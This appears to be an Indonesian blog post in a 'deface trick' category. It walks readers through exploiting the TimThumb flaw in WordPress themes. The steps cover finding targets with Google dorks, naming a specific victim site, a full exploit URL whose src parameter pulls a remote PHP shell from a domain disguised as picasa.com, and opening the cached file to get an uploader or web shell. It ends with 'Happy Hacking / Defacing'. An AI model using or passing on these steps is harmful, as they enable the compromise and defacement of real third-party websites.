10:28 PM
gilang
#########
"TIMTHUMB EXPLOIT VULNERABLITY"
Pasti dah ga asing lagi dengan namanya timthumb
Yang harus disiapin ::
- ThumbShell ::| Harus sudah tercampur dengan .JPG atau .PHP :: http://www.youtube.com/watch?v=yIjjHByz9Pc |::
- Nyali ::
- SkiLL
===
1. Pakai dork google , bisa dapat dari http://zone-info.web.id/files/dorktim.txt . kalau sudah dapat lanjut ke langkah slanjut nya
2. Aku ambil sample :: http://lapolverosa.eu//wp-content/themes/Nyke/timthumb.php <<
3. Ok , kita lakukan exploit nya . [expl: ?src=[[disini tmpat thumbshell]]
4. Thumbshell nya masih punya orang :: http://picasa.com.snap-u.com/yahoo.php << buatlah subdomain [[ picasa.com / img.youtube.com / etc .. ]] .
5. http://lapolverosa.eu//wp-content/themes/Nyke/timthumb.php?src=http://picasa.com.snap-u.com/yahoo.php . jika berhasil :: akan ada tulisan :
[gasemua gini]
Unable to open image : /home/lapolver/public_html/wp-content/themes/Nyke/cache/external_b712fe675191c264b1326871cd5f3d0c.php
6. ok , jika sukses maka kita buka : http://lapolverosa.eu/wp-content/themes/Nyke/cache/external_b712fe675191c264b1326871cd5f3d0c.php
7. Jika sukses url diatas akan muncul uploader/shell << tergantung thumbshell yang dipasang
8. Happy Hacking / Defacing :)
Maap kalo kurang jelas , maklum saya newbie .
nulis sendiri >_<
Kalo kurang jelas bs tanyakan sama saya :)
Wassalam :)
MafiaChoco
Posted in:
deface trick
0 comments :
Post a Comment